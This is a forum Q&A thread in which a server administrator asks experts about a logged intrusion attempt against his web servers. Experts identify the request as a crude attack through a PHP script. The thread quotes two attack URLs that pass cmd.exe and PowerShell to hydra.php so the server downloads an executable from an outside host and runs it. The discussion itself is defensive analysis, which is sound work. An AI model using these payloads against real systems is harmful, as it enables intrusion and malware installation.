powershell exploit attempt

trojan81
trojan81 used Ask the Experts™
on
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system.  For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com

zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
Top Rated Freelancer on MS Technologies
Awarded 2018
Distinguished Expert 2018
Commented:
it's trying to download "http://a46.bulehero.in/download.exe" as "C:\8.exe" and start the 8.exe.
I (by curiosity) just tried the http://a46.bulehero.in/download.exe on my browser and it doesn't bring anything (404 error)
so I'm unable to answer that :)

I think is trying somehow to run from your php page CMD and then PowerShell to run that.

Author

Commented:
Jose try this one

public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fuckyou.com/fuckyou.exe','C:/12.exe');start%20C:/12.exe

Author

Commented:
Whatever it is doing, my webserver is no vulnerable so it didn't execute anything.  I'm curious which vulnerability it is targetting.
HTML5 and CSS3 Fundamentals

Build a website from the ground up by first learning the fundamentals of HTML5 and CSS3, the two popular programming languages used to present content online. HTML deals with fonts, colors, graphics, and hyperlinks, while CSS describes how HTML elements are to be displayed.

Jose Gabriel Ortega CastroTop Rated Freelancer on MS Technologies
Awarded 2018
Distinguished Expert 2018

Commented:
Same 404 :)
Qlemo"Batchelor", Developer and EE Topic Advisor
Top Expert 2015
Commented:
It's a very primitive attack, but I'm unable to find anything similar, so cannot tell about details. No website should execute arbitrary code using a PHP script, so being vulnerable is unlikely.

Author

Commented:
Jose/Qlemo,

Would you say that it is trying to invoke powershell to download and run the file?
Qlemo"Batchelor", Developer and EE Topic Advisor
Top Expert 2015

Commented:
Yes. but that would require to run PHP code in hydra.php located on your web site's public folder. Maybe a reference to http://www.markus-lanthaler.com/hydra/, and the crafted (cheap) attack based on that API?
Jose Gabriel Ortega CastroTop Rated Freelancer on MS Technologies
Awarded 2018
Distinguished Expert 2018

Commented:

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial